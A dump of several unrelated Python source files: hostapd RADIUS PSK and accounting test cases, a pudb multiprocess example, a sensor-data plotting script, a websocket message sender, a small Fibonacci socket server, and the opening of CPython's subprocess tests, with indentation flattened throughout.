finally:
t_events['stop'].set()
t.join()
def test_radius_psk_invalid(dev, apdev):
"""WPA2 with invalid PSK from RADIUS"""
t, t_events = start_radius_psk_server("1234567")
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
time.sleep(1)
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_invalid2(dev, apdev):
"""WPA2 with invalid PSK (hexstring) from RADIUS"""
t, t_events = start_radius_psk_server(64*'q')
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
time.sleep(1)
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_hex_psk(dev, apdev):
"""WPA2 with PSK hexstring from RADIUS"""
t, t_events = start_radius_psk_server(64*'2', acct_interim_interval=19,
session_timeout=123)
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", raw_psk=64*'2', scan_freq="2412")
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_unknown_code(dev, apdev):
"""WPA2 with PSK from RADIUS and unknown code"""
t, t_events = start_radius_psk_server(64*'2', invalid_code=True)
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
time.sleep(1)
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_reject(dev, apdev):
"""WPA2 with PSK from RADIUS and reject"""
t, t_events = start_radius_psk_server("12345678", reject=True)
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-AUTH-REJECT"], timeout=10)
if ev is None:
raise Exception("No CTRL-EVENT-AUTH-REJECT event")
dev[0].request("DISCONNECT")
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_oom(dev, apdev):
"""WPA2 with PSK from RADIUS and OOM"""
t, t_events = start_radius_psk_server(64*'2')
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
dev[0].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "=hostapd_acl_recv_radius"):
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_default(dev, apdev):
"""WPA2 with default PSK"""
ssid = "test-wpa2-psk"
params = hostapd.radius_params()
params['ssid'] = ssid
params["wpa"] = "2"
params["wpa_key_mgmt"] = "WPA-PSK"
params["rsn_pairwise"] = "CCMP"
params['macaddr_acl'] = '2'
params['wpa_psk_radius'] = '1'
params['wpa_passphrase'] = 'qwertyuiop'
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect(ssid, psk="qwertyuiop", scan_freq="2412")
dev[0].dump_monitor()
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].dump_monitor()
hapd.disable()
hapd.set("wpa_psk_radius", "2")
hapd.enable()
dev[0].connect(ssid, psk="qwertyuiop", scan_freq="2412", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-AUTH-REJECT"], timeout=10)
if ev is None:
raise Exception("No CTRL-EVENT-AUTH-REJECT event")
dev[0].request("DISCONNECT")
def test_radius_auth_force_client_addr(dev, apdev):
"""RADIUS client address specified"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['radius_client_addr'] = "127.0.0.1"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth")
@remote_compatible
def test_radius_auth_force_invalid_client_addr(dev, apdev):
"""RADIUS client address specified and invalid address"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
#params['radius_client_addr'] = "10.11.12.14"
params['radius_client_addr'] = "1::2"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected connection")
def add_message_auth(req):
req.authenticator = req.CreateAuthenticator()
hmac_obj = hmac.new(req.secret)
hmac_obj.update(struct.pack("B", req.code))
hmac_obj.update(struct.pack("B", req.id))
# request attributes
req.AddAttribute("Message-Authenticator", 16*b"\x00")
attrs = req._PktEncodeAttributes()
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(req.authenticator)
hmac_obj.update(attrs)
del req[80]
req.AddAttribute("Message-Authenticator", hmac_obj.digest())
def test_radius_server_failures(dev, apdev):
"""RADIUS server failure cases"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
dict = pyrad.dictionary.Dictionary("dictionary.radius")
client = pyrad.client.Client(server="127.0.0.1", authport=1812,
secret=b"radius", dict=dict)
client.retries = 1
client.timeout = 1
# unexpected State
req = client.CreateAuthPacket(code=pyrad.packet.AccessRequest,
User_Name="foo")
req['State'] = b'foo-state'
add_message_auth(req)
reply = client.SendPacket(req)
if reply.code != pyrad.packet.AccessReject:
raise Exception("Unexpected RADIUS response code " + str(reply.code))
# no EAP-Message
req = client.CreateAuthPacket(code=pyrad.packet.AccessRequest,
User_Name="foo")
add_message_auth(req)
try:
reply = client.SendPacket(req)
raise Exception("Unexpected response")
except pyrad.client.Timeout:
pass
def test_ap_vlan_wpa2_psk_radius_required(dev, apdev):
"""AP VLAN with WPA2-PSK and RADIUS attributes required"""
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
logger.info("Received authentication request")
reply = self.CreateReplyPacket(pkt)
reply.code = pyrad.packet.AccessAccept
secret = reply.secret
if self.t_events['extra'].is_set():
reply.AddAttribute("Chargeable-User-Identity", "test-cui")
reply.AddAttribute("User-Name", "test-user")
if self.t_events['long'].is_set():
reply.AddAttribute("Tunnel-Type", 13)
reply.AddAttribute("Tunnel-Medium-Type", 6)
reply.AddAttribute("Tunnel-Private-Group-ID", "1")
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_events):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_events = t_events
while not t_events['stop'].is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
b"radius",
"localhost")
srv.BindToAddress("")
t_events = {}
t_events['stop'] = threading.Event()
t_events['long'] = threading.Event()
t_events['extra'] = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_events))
t.start()
try:
ssid = "test-wpa2-psk"
params = hostapd.radius_params()
params['ssid'] = ssid
params["wpa"] = "2"
params["wpa_key_mgmt"] = "WPA-PSK"
params["rsn_pairwise"] = "CCMP"
params['macaddr_acl'] = '2'
params['dynamic_vlan'] = "2"
params['wpa_passphrase'] = '0123456789abcdefghi'
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(apdev[0], params)
logger.info("connecting without VLAN")
dev[0].connect(ssid, psk="0123456789abcdefghi", scan_freq="2412",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-SSID-TEMP-DISABLED"], timeout=20)
if ev is None:
raise Exception("Timeout on connection attempt")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected success without vlan parameters")
logger.info("connecting without VLAN failed as expected")
logger.info("connecting without VLAN (CUI/User-Name)")
t_events['extra'].set()
dev[1].connect(ssid, psk="0123456789abcdefghi", scan_freq="2412",
wait_connect=False)
ev = dev[1].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-SSID-TEMP-DISABLED"], timeout=20)
if ev is None:
raise Exception("Timeout on connection attempt")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected success without vlan parameters(2)")
logger.info("connecting without VLAN failed as expected(2)")
t_events['extra'].clear()
t_events['long'].set()
logger.info("connecting with VLAN")
dev[2].connect(ssid, psk="0123456789abcdefghi", scan_freq="2412",
wait_connect=False)
ev = dev[2].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-SSID-TEMP-DISABLED"], timeout=20)
if ev is None:
raise Exception("Timeout on connection attempt")
if "CTRL-EVENT-SSID-TEMP-DISABLED" in ev:
raise Exception("Unexpected failure with vlan parameters")
logger.info("connecting with VLAN succeeded as expected")
finally:
t_events['stop'].set()
t.join()
def test_radius_mppe_failure(dev, apdev):
"""RADIUS failure when adding MPPE keys"""
params = { "ssid": "as", "beacon_int": "2000",
"radius_server_clients": "auth_serv/radius_clients.conf",
"radius_server_auth_port": '18127',
"eap_server": "1",
"eap_user_file": "auth_serv/eap_user.conf",
"ca_cert": "auth_serv/ca.pem",
"server_cert": "auth_serv/server.pem",
"private_key": "auth_serv/server.key" }
authsrv = hostapd.add_ap(apdev[1], params)
params = hostapd.wpa2_eap_params(ssid="test-wpa2-eap")
params['auth_server_port'] = "18127"
hapd = hostapd.add_ap(apdev[0], params)
with fail_test(authsrv, 1, "os_get_random;radius_msg_add_mppe_keys"):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", eap="TTLS",
identity="user", anonymous_identity="ttls",
password="password",
ca_cert="auth_serv/ca.pem", phase2="autheap=GTC",
wait_connect=False, scan_freq="2412")
dev[0].wait_disconnected()
dev[0].request("REMOVE_NETWORK all")
def test_radius_acct_failure(dev, apdev):
"""RADIUS Accounting and failure to add attributes"""
# Connection goes through, but Accounting-Request cannot be sent out due to
# NAS-Identifier being too long to fit into a RADIUS attribute.
params = { "ssid": "radius-acct-open",
'acct_server_addr': "127.0.0.1",
'acct_server_port': "1813",
'acct_server_shared_secret': "radius",
'nas_identifier': 255*'A' }
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
def test_radius_acct_failure_oom(dev, apdev):
"""RADIUS Accounting and failure to add attributes due to OOM"""
params = { "ssid": "radius-acct-open",
'acct_server_addr': "127.0.0.1",
'acct_server_port': "1813",
'acct_server_shared_secret': "radius",
'radius_acct_interim_interval': "1",
'nas_identifier': 250*'A',
'radius_acct_req_attr': [ "126:s:" + 250*'B',
"77:s:" + 250*'C',
"127:s:" + 250*'D',
"181:s:" + 250*'E' ] }
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
dev[0].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_msg"):
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[1].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "accounting_sta_report"):
dev[1].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
dev[1].request("REMOVE_NETWORK all")
dev[1].wait_disconnected()
tests = [ (1, "radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_msg"),
(2, "radius_msg_add_attr;accounting_msg"),
(3, "radius_msg_add_attr;accounting_msg") ]
for count, func in tests:
with fail_test(hapd, count, func):
dev[0].connect("radius-acct-open", key_mgmt="NONE",
scan_freq="2412")
wait_fail_trigger(hapd, "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
with fail_test(hapd, 8,
"radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_sta_report"):
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
wait_fail_trigger(hapd, "GET_FAIL")
with fail_test(hapd, 1, "radius_msg_add_attr;=accounting_report_state"):
hapd.disable()
def test_radius_acct_failure_oom_rsn(dev, apdev):
"""RADIUS Accounting in RSN and failure to add attributes due to OOM"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
params['radius_acct_interim_interval'] = "1"
params['nas_identifier'] = 250*'A'
params['radius_acct_req_attr'] = [ "126:s:" + 250*'B',
"77:s:" + 250*'C',
"127:s:" + 250*'D',
"181:s:" + 250*'E' ]
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
dev[0].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_msg"):
connect(dev[0], "radius-acct")
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
dev[1].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "accounting_sta_report"):
connect(dev[1], "radius-acct")
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
dev[2].scan_for_bss(bssid, freq="2412")
connect(dev[2], "radius-acct")
for i in range(1, 8):
with alloc_fail(hapd, i, "radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_msg"):
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
for i in range(1, 15):
with alloc_fail(hapd, i, "radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_sta_report"):
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
def test_radius_acct_failure_sta_data(dev, apdev):
"""RADIUS Accounting and failure to get STA data"""
params = { "ssid": "radius-acct-open",
'acct_server_addr': "127.0.0.1",
'acct_server_port': "1813",
'acct_server_shared_secret': "radius" }
hapd = hostapd.add_ap(apdev[0], params)
with fail_test(hapd, 1, "accounting_sta_update_stats"):
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
hapd.wait_event(["AP-STA-DISCONNECTED"], timeout=1)
|
multiprocess_main.py
|
# -*- encoding: utf-8 -*-
import multiprocessing as mp
import time
from pudb.remote import set_trace
def worker(worker_id):
""" Simple worker process"""
i = 0
while i < 10:
if worker_id == 1: # debug process with id 1
set_trace(term_size=(80, 24))
time.sleep(1) # represents some work
print('In Process {}, i:{}'.format(worker_id, i))
i = i + 1
if __name__ == '__main__':
processes = []
for p_id in range(2): # 2 worker processes
p = mp.Process(target=worker, args=(p_id,))
p.start()
processes.append(p)
for p in processes:
p.join()
|
graph_maker.py
|
# * MakeGraphUsingTinyEKFDLL
# *
# * Copyright (C) 2022 DukiChoi
# *
# * MIT License
# -*- coding: utf-8 -*-
from calendar import c
from inspect import _void
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from mpl_toolkits.mplot3d import Axes3D
# Data Load
import serial
import time
import signal
import threading
import ctypes
from ctypes import *
import os
#os.add_dll_directory(os.getcwd())
os.environ['PATH'] = './lib.dll' + os.pathsep + os.environ['PATH']
i = c_double(0)
pi = pointer(i)
x = []
y = []
z = []
port = 'COM6'
baud = 9600
exitThread = False
# %%
# ANIMATION FUNCTION
def func(num, dataSet, line, redDots):
# NOTE: there is no .set_data() for 3 dim data...
line.set_data(dataSet[0:2, :num])
line.set_3d_properties(dataSet[2, :num])
redDots.set_data(dataSet[0:2, :num])
redDots.set_3d_properties(dataSet[2, :num])
return line
# %%
def handler(signum, frame):
exitThread = True
# 데이터 처리할 함수
def parsing_data(data):
tmp = ''.join(data)
print(tmp)
# 본 쓰레드
def readThread(ser):
global line
global exitThread
global x
global y
global z
while not exitThread:
idx = 0
for c in ser.read():
if idx % 3 == 0:
x.append(float(c))
elif idx % 3 == 1:
y.append(float(c))
else:
z.append(float(c))
idx = idx + 1
# %% [markdown]
#
# %% [markdown]
#
# %%
# %%
if __name__ == "__main__":
# %%
# 종료 시그널 등록
# signal.signal(signal.SIGINT, handler)
#
# ser = serial.Serial(port, baud, timeout=0)
# if ser.readable():
# res = ser.readline()
# # print(res)
#
# thread = threading.Thread(target=readThread, args=(ser,))
# thread.start()
#
# plot
#pd array형태로 csv파일 읽어오기
#####여기서 txt명과 데이터 개수를 적어주세요#####
##############################################
file_name = "circle_test2"
##############################################
#데이터 개수 바꾸려면 dll다시 설정해야함 기본 100개 데이터로 설정해둠.
data_amount = 100
#csv로 바꿔주고 9축 데이터 읽어옴
df = pd.read_csv('./test_files/' + file_name + '.txt', sep = '\t')
df.to_csv(r'./test_files/'+ file_name + '.csv')
new_df = pd.read_csv('./test_files/'+ file_name + '.csv')
m = new_df.values
#print(m)
data_matrix1 = m[0:data_amount, 3:6].astype(np.float64)
data_matrix2 = m[0:data_amount, 6:9].astype(np.float64)
data_matrix3 = m[0:data_amount, 13:16].astype(np.float64)
print("입력값 A행렬:\n" , data_matrix1)
print("입력값 W행렬:\n" , data_matrix2)
print("입력값 H행렬:\n" , data_matrix3)
#입력 배열 포인터에 할당하기
filter1 = np.array(data_matrix1, dtype=np.float64)
pointer_a = filter1.ctypes.data_as(ctypes.POINTER(ctypes.c_double*(data_amount*3)))
filter2 = np.array(data_matrix2, dtype=np.float64)
pointer_b = filter2.ctypes.data_as(ctypes.POINTER(ctypes.c_double*(data_amount*3)))
filter3 = np.array(data_matrix3, dtype=np.float64)
pointer_c = filter3.ctypes.data_as(ctypes.POINTER(ctypes.c_double*(data_amount*3)))
#ctypes를 이용해서 dll 라이브러리의 함수에 9축 데이터를 3개의 array배열 입력 1개의 array배열 출력
print("Dll function call")
libc = ctypes.CDLL('./Dll_lib.dll')
#함수 입력 형식 900개 double값
libc.make_string.argtypes = {ctypes.POINTER(ctypes.c_double*(data_amount*3)), ctypes.POINTER(ctypes.c_double*(data_amount*3)), ctypes.POINTER(ctypes.c_double*(data_amount*3))}
#함수 출력 형식 300개 double값
libc.make_string.restype = ctypes.POINTER(ctypes.c_double*(data_amount*3))
arrayptr = libc.make_string(pointer_a, pointer_b, pointer_c)
c_array = [x for x in arrayptr.contents]
print("S행렬 출력: ", len(c_array), "개 \n", c_array)
# #여기는 실험영역...
# # ctypes로 python배열에서 c++ 포인터 배열로 바꾸기. c++로 구현해야함.
# filter = np.array([[1, 0, 1], [1, 0, 1], [1, -1, 0]], dtype=np.float64)
# a = filter.ctypes.data_as(ctypes.POINTER(ctypes.c_double*9))
# print([x for x in a.contents])
#c_array 값 출력
idx =0
for c in c_array:
if idx %3 ==0 :
x.append(c)
elif idx%3 ==1:
y.append(c)
elif idx%3 ==2:
z.append(c)
idx = idx + 1
dataSet = np.array([x, y, z])
#print(x)
#print(y)
#print(z)
numDataPoints = 100
# GET SOME MATPLOTLIB OBJECTS
fig = plt.figure()
ax = Axes3D(fig)
redDots = plt.plot(dataSet[0], dataSet[1], dataSet[2], lw=2, c='r', marker='o')[0] # For scatter plot
# NOTE: Can't pass empty arrays into 3d version of plot()
line = plt.plot(dataSet[0], dataSet[1], dataSet[2], lw=2, c='g')[0] # For line plot
# AXES PROPERTIES]
ax.set_xlim3d([-10, 10])
ax.set_ylim3d([-10, 10])
ax.set_zlim3d([-10, 10])
ax.set_xlabel('X(t)')
ax.set_ylabel('Y(t)')
ax.set_zlabel('Z(t)')
ax.set_title('Trajectory of electron for E vector along [120]')
# Creating the Animation object
line_ani = animation.FuncAnimation(fig, func, frames=numDataPoints, fargs=(dataSet, line, redDots), interval=50,
blit=False)
# line_ani.save(r'Animation.mp4')
plt.show()
|
socket_sender.py
|
import os
import json
import logging
import datetime
from threading import Thread
logger = logging.getLogger(__name__)
# The SocketSender runs a thread that sends messages (temporarily stored in DB) out to websockets.
class SocketSender(Thread):
def __init__(self):
logger.info('init socket sender')
Thread.__init__(self, daemon=True)
self.connections = [] # list of WebSocketConnection objects
# register a client (possible message recipient)
def register(self, ws_conn):
logger.info('client registered (%s)', ws_conn)
self.connections.append(ws_conn)
# unregister a client (e.g. after it has been closed
def unregister(self, ws_conn):
logger.info('client unregistered (%s)', ws_conn)
self.connections.remove(ws_conn)
# send a message to a specific client (using websocket connection specified in ws_conn)
def send(self, ws_conn, message):
# if it was recently closed, it may still be in the list of connections; it should be removed as soon as manage_web_socket terminates
if not ws_conn.ws.closed:
try:
ws_conn.ws.send(message)
except Exception: # pylint: disable=broad-except
print('unable to send to websocket (%s)', ws_conn)
# send a message structure to a specific client
def send_message(self, ws_conn, message_type, parameters):
message_struct = {
'type': message_type,
'timestamp': datetime.datetime.utcnow().isoformat() + 'Z',
'parameters': parameters
}
self.send(ws_conn, json.dumps(message_struct))
# send an error message back to a client
def send_error(self, ws_conn, message_text):
self.send_message(ws_conn, 'error', {'message': message_text})
# this function sits in a loop, waiting for messages that need to be sent out to subscribers
def run(self):
from main.app import message_queue
while True:
# get all messages since the last message we processed
messages = message_queue.receive()
logger.debug('received %d messages from message queue', messages.count())
for message in messages:
logger.debug('message type: %s, folder: %s', message.type, message.folder_id)
# handle special messages aimed at this module
if message.type == 'requestProcessStatus':
self.send_process_status()
# all other messages are passed to clients managed by this process
else:
for ws_conn in self.connections:
if client_is_subscribed(message, ws_conn, False):
message_struct = {
'type': message.type,
'timestamp': message.timestamp.isoformat() + 'Z',
'parameters': json.loads(message.parameters)
}
Thread(target=self.send, daemon=True, args=[ws_conn, json.dumps(message_struct)]).start()
if ws_conn.controller_id:
logger.debug('sending message to controller; type: %s', message.type)
else:
logger.debug('sending message to browser; type: %s', message.type)
# send information about the current process as a message to the system folder
# (in a multi-process environment, each process has an instance of this class)
# fix(clean): move elsewhere?
def send_process_status(self):
from main.app import db # import here to avoid import loop
from main.app import message_queue # import here to avoid import loop
from main.resources.resource_util import find_resource # import here to avoid import loop
process_id = os.getpid()
connections = []
for ws_conn in self.connections:
connections.append({
'connected': ws_conn.connected(),
'controller_id': ws_conn.controller_id,
'user_id': ws_conn.user_id,
'auth_method': ws_conn.auth_method,
'process_id': process_id,
'subscriptions': [s.as_dict() for s in ws_conn.subscriptions],
})
parameters = {
'process_id': process_id,
'clients': connections, # fix(later): rename to connections?
'db_pool': db.engine.pool.size(),
'db_conn': db.engine.pool.checkedout(),
}
system_folder_id = find_resource('/system').id
message_queue.add(system_folder_id, '/system', 'processStatus', parameters)
# returns True if the given message should be sent to the given client (based on its current subscriptions)
# fix(clean): move into wsConn?
def client_is_subscribed(message, ws_conn, debug_mode):
if message.sender_controller_id:
if ws_conn.controller_id and message.sender_controller_id == ws_conn.controller_id:
return False # don't bounce messages back to controller sender
if ws_conn.user_id and message.sender_user_id == ws_conn.user_id:
return False # don't bounce messages back to user sender (note this prevents sending message from one browser tab to another)
for subscription in ws_conn.subscriptions:
if subscription.matches(message):
if debug_mode:
print(' client subscription matches; folders: %s, type: %s' % (subscription.folder_ids, subscription.message_type))
return True
else:
if debug_mode:
print(' client subscription does not match; folders: %s, type: %s' % (subscription.folder_ids, subscription.message_type))
return False
# clear controller connection status on startup
def clear_web_sockets():
# fix(soon): what if we spin up another process after some are connected?
from main.resources.models import ControllerStatus # would like to do at top, but creates import loop in __init__
from main.app import db # would like to do at top, but creates import loop in __init__
controller_statuses = ControllerStatus.query.all()
for controller_status in controller_statuses:
controller_status.web_socket_connected = False
db.session.commit()
db.session.close()
|
server.py
|
# Much of this code follows verbatim after David Beazley's excellent "Concurrency from the Ground Up"
# https://www.youtube.com/watch?v=MCs5OvhV9S4
# Please refer to David's terms of license; the MIT license might not apply to this code
# server.py
# Fib microservice
from socket import *
from fib import fib
from threading import Thread
from concurrent.futures import ProcessPoolExecutor as Pool # concurrent.futures available for >= Py3.2
pool = Pool(4)
def fib_server(address):
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind(address)
sock.listen(5)
while True:
client, addr = sock.accept()
print("Connection", addr)
Thread(target=fib_handler, args=(client,), daemon=True).start() # Daemon argument for Thread in >= Py3.3
def fib_handler(client):
while True:
req = client.recv(100)
if not req:
break
n = int(req)
future = pool.submit(fib, n)
result = future.result()
resp = str(result).encode('ascii') + b'\n'
client.send(resp)
print("Closed")
fib_server(('', 20000))
|
test_subprocess.py
|
import unittest
from test import test_support
import subprocess
import sys
import platform
import signal
import os
import errno
import tempfile
import time
import re
import sysconfig
try:
import ctypes
except ImportError:
ctypes = None
try:
import resource
except ImportError:
resource = None
try:
import threading
except ImportError:
threading = None
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
test_support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = re.sub(r"\[\d+ refs\]\r?\n?$", "", stderr)
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print 'BDFL'"])
self.assertIn('BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn('BDFL', output)
def test_check_output_stdout_arg(self):
# check_output() function stderr redirected to stdout
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print 'will not be run'"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with test_support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print "banana"'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print \'test_stdout_none\'"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), 'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print "banana"'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def test_executable_with_cwd(self):
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(["somethingyoudonthave", "-c",
